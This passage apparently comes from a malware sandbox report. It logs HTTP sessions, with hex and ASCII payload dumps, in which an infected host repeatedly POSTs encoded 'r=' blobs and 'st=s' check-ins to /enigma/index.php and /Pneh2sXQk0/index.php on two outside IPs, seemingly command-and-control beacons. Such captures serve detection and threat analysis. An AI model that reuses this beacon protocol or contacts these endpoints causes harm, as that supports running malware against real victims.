                                                                                                                                                                                                                                      1289192.168.2.551143193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:53.822442055 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:54.075052023 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:53 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1290192.168.2.551144193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:54.317645073 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:54.571146965 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:54 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1291192.168.2.551145193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:54.426935911 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:54.670650959 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:54 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:54.674711943 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:54.924424887 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:54 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1292192.168.2.551146193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:54.915105104 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:55.160861015 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:55 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1293192.168.2.551147193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:55.271277905 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:55.516779900 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:55 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1294192.168.2.551148193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:55.413913012 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:55.665287971 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:55 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1295192.168.2.551149193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:55.771285057 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:56.025346994 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:55 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1296192.168.2.551150193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:56.011758089 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:56.259736061 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:56 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1297192.168.2.551151193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:56.381423950 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:56.625293016 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:56 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1298192.168.2.551152193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:56.515048027 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:56.770658016 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:56 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1299192.168.2.551153193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:56.872944117 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:57.120807886 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:56 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1300192.168.2.551154193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:57.119616985 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:57.367763042 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:57 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1301192.168.2.551155193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:57.478259087 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:57.726172924 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:57 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1302192.168.2.551156193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:57.627012968 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:57.882671118 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:57 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1303192.168.2.551157193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:57.978913069 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:58.232273102 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:58 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1304192.168.2.551158193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:58.231426001 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:58.483089924 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:58 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1305192.168.2.551159193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:58.580486059 CEST155OUTPOST /enigma/index.php HTTP/1.1
